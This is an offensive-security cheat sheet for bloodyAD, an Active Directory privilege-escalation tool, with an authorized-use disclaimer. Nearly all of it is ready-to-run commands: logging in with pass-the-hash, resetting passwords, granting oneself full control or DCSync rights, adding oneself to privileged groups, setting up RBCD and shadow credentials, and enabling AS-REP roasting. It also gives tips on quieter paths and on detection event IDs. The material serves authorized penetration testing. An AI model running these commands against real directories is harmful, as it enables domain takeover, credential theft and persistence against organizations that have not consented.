BLOODYAD
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
bloodyAD is a Python AD privilege-escalation framework that manipulates directory objects via LDAP (and LDAPS). It reads and WRITES AD objects to exploit ACL/DACL misconfigurations discovered by BloodHound - reset passwords, add group members, set delegation, and more. Authorized only.
CONNECTION#
bloodyAD --host <dc> -d corp.lu -u user -p 'Pass' <action> bloodyAD --host <dc> -d corp.lu -u user -p ':<nthash>' <action> # PtH bloodyAD --host <dc> -d corp.lu -k <action> # Kerberos bloodyAD --host <dc> -d corp.lu -u user -p 'Pass' \ --secure <action> # LDAPS
ENUMERATION (GET)#
bloodyAD ... get object <target> # Read an object's attrs bloodyAD ... get children # List child objects bloodyAD ... get writable # Objects YOU can write bloodyAD ... get writable --detail # With permissions bloodyAD ... get membership <user> # Group memberships bloodyAD ... get search --filter '(objectClass=user)' bloodyAD ... get dnsDump # Dump AD-integrated DNS # 'get writable' is the key recon: it shows exactly which escalation # primitives below are actually available to your identity
PASSWORD & ACCOUNT (SET)#
bloodyAD ... set password <target> 'NewPass1!' # Reset a user's password bloodyAD ... set owner <target> <you> # Take object ownership bloodyAD ... add genericAll <target> <you> # Grant yourself full ctrl bloodyAD ... remove genericAll <target> <you> # Clean up afterward
GROUP MEMBERSHIP#
bloodyAD ... add groupMember <group> <user> # Add to group bloodyAD ... remove groupMember <group> <user> # Remove (cleanup) # e.g. add yourself to a privileged group you have write over
DELEGATION / RBCD#
bloodyAD ... add rbcd <target-computer> <attacker-computer>
# Configure RBCD
bloodyAD ... add computer ATTACKER 'CompPass1!' # Create a computer acct
bloodyAD ... remove rbcd <target> <attacker> # Cleanup
# Then use impacket getST (S4U) to impersonate -> access target
DCSYNC RIGHTS / SHADOW CREDS#
bloodyAD ... add dcsync <user> # Grant DCSync to a user bloodyAD ... remove dcsync <user> # Revoke (cleanup) bloodyAD ... add shadowCredentials <target> # Key Credential (PKINIT) bloodyAD ... remove shadowCredentials <target> # Cleanup # shadowCredentials -> obtain a cert/TGT for the target without pw reset
UAC / ATTRIBUTES#
bloodyAD ... add uac <target> -f DONT_REQ_PREAUTH # Enable AS-REP roast bloodyAD ... remove uac <target> -f DONT_REQ_PREAUTH bloodyAD ... set object <target> <attr> -v <value>
EXAMPLES#
# Find what you can write, then escalate via the available primitive bloodyAD --host dc -d corp.lu -u user -p 'Pass' get writable --detail # Add yourself to a privileged group you have write access over bloodyAD --host dc -d corp.lu -u user -p 'Pass' \ add groupMember 'Helpdesk Admins' user # Shadow Credentials takeover of a target (no password reset needed) bloodyAD --host dc -d corp.lu -u user -p 'Pass' \ add shadowCredentials svc_admin # Grant DCSync, replicate, then revoke (via impacket secretsdump) bloodyAD --host dc -d corp.lu -u user -p 'Pass' add dcsync user
NOTES#
- Workflow: BloodHound finds the ACL path -> bloodyAD executes it over LDAP (you already have BLOODHOUND for the graph) - Always run 'get writable' first - it tells you which actions succeed - shadowCredentials and rbcd are quieter than password resets and are password-reset resistant persistence-adjacent primitives - CLEAN UP: every add has a matching remove - reverse changes and log them for the engagement report - LDAP signing/channel binding do not block authenticated writes, but detection watches for anomalous ACL/attribute changes (4662/5136) - Exact subcommand names vary by version - run 'bloodyAD -h' to confirm - Pairs with LDAP-ENUM, ADCS-ATTACKS, KERBEROASTING sheets